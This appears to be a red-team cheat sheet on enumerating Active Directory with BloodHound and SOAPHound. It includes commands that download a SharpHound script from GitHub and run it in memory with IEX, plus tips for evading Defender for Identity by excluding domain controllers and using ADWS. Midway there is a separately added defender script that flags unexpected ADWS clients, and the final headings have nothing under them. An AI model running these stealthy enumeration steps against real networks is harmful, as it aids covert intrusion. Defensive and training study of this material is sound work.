Bloodhound Enumeration

There are two free versions of BloodHound

  • BloodHound Legacy - https://github.com/BloodHoundAD/BloodHound

  • BloodHound CE (Community Edition) - https://github.com/SpecterOps/BloodHound

Supply data to BloodHound with Loader.exe

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\BloodHound-master\BloodHound-master\Collectors\SharpHound.exe -args --collectionmethods All

Supply data to BloodHound with IEX

IEX(IWR -usebasicparsing https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1);Invoke-Bloodhound -CollectionMethod "All,GPOLocalGroup"

Avoid Detection by MDI with Loader.exe

To make BloodHound collection stealthier, remove the noisy collection methods (RDP, DCOM, PSRemote and LocalAdmin) and use the exclude-DCs option (--excludedcs for SharpHound.exe, -ExcludeDCs for Invoke-BloodHound) to avoid detection by MDI:

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SharpHound\SharpHound.exe -args --collectionmethods Group,GPOLocalGroup,Session,Trusts,ACL,Container,ObjectProps,SPNTargets,CertServices --excludedcs

Remember to remove the 'CertServices' collection method when using BloodHound legacy collector.

Avoid Detection by MDI with IEX

IEX(IWR -usebasicparsing https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1);Invoke-Bloodhound -CollectionMethod "All,GPOLocalGroup" -ExcludeDCS

SOAPHound Enumeration

Use SOAPHound for even more stealth. It talks to Active Directory Web Services (ADWS, port 9389) instead of sending LDAP queries, just like the AD PowerShell module does.

  • Almost no network-based detection (such as MDI).

  • It retrieves information about all objects (objectGuid=*) and then processes them. This means a limited number of LDAP queries and less chance of endpoint detection.
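Because SOAPHound reaches the domain controller over ADWS rather than LDAP, LDAP-centric detections miss it, but the TCP 9389 connection itself is still visible on the client (Sysmon Event ID 3 style network events) and in DC-side firewall logs. The script below is an added defender-side example, not code from the page or from the SOAPHound project; it baselines the hosts and processes expected to use ADWS (the AD PowerShell module on admin workstations) and flags everything else. The event records, host names and the baseline are constructed assumptions.

```python
"""Flag unexpected clients of Active Directory Web Services (ADWS, TCP 9389).

Records use a simplified Sysmon-3-like field layout and are constructed
samples; the baseline of expected ADWS clients is an assumption for the demo.
"""
from collections import defaultdict

ADWS_PORT = 9389

# Assumed baseline: (host, process) pairs that legitimately talk to ADWS,
# e.g. admins running the AD PowerShell module from a hardened workstation.
EXPECTED_CLIENTS = {
    ("ADMIN-WS01", "powershell.exe"),  # AD PowerShell module from admin host
    ("MGMT-SRV01", "dsac.exe"),        # Active Directory Administrative Center
}

# Constructed sample network-connection events (client-side telemetry).
SAMPLE_EVENTS = [
    {"host": "ADMIN-WS01", "image": "powershell.exe", "dst": "DC01", "dst_port": 9389},
    {"host": "USER-WS17", "image": "powershell.exe", "dst": "DC01", "dst_port": 9389},
    {"host": "USER-WS17", "image": "powershell.exe", "dst": "DC01", "dst_port": 9389},
    {"host": "USER-WS17", "image": "chrome.exe", "dst": "intranet", "dst_port": 443},
    {"host": "BUILD-01", "image": "loader.exe", "dst": "DC02", "dst_port": 9389},
]


def find_unexpected_adws_clients(events, baseline=EXPECTED_CLIENTS):
    """Return {(host, image): connection_count} for ADWS connections
    that do not come from a baselined (host, process) pair."""
    hits = defaultdict(int)
    for ev in events:
        if ev["dst_port"] != ADWS_PORT:
            continue  # not ADWS traffic, ignore
        key = (ev["host"], ev["image"])
        if key in baseline:
            continue  # known-good ADWS consumer
        hits[key] += 1
    return dict(hits)


if __name__ == "__main__":
    for (host, image), count in find_unexpected_adws_clients(SAMPLE_EVENTS).items():
        print(f"ALERT unexpected ADWS client: {host} {image} ({count} connection(s))")
```

A user workstation or build server opening TCP 9389 to a domain controller is the signal to investigate; tune the baseline to the hosts that actually run the AD module in your environment.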

Build a cache that includes basic info about domain objects

Collect BloodHound compatible data